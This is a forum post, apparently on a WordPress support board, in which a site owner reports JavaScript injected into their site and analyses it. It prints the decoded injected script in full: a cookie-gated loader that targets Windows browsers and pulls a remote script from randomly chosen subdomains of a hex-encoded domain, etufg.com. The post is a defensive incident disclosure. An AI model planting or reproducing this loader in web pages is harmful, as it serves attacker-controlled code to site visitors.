Javascript Injection Report – based in etufg.com
-
I have just discovered an incident of Javascript Injection on my WordPress-based website. I am running the latest version of WP, and all associated plugins.
The raw code is inserted just after the opening
body
tag.The raw code is:
[hack code moderated]
This can be decoded to:
<ads><script type="text/javascript">document.write( <script>var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')};</script> );</script></ads>
The URL at the end, which seems to be the co-ordinating centre for the attack is in Hex, and translates to:
etufg.com
So, this code seems to be randomly picking one of the following subdomains within that domain:
- keg.etufg.com
- kei.etufg.com
- ken.etufg.com
- kep.etufg.com
- kev.etufg.com
- kex.etufg.com
- key.etufg.com
- khi.etufg.com
- kid.etufg.com
- kif.etufg.com
I would not be surprised if further subdomains and/or domains are involved, but this is just the rest of my first 40 minutes of investigations.
- The topic ‘Javascript Injection Report – based in etufg.com’ is closed to new replies.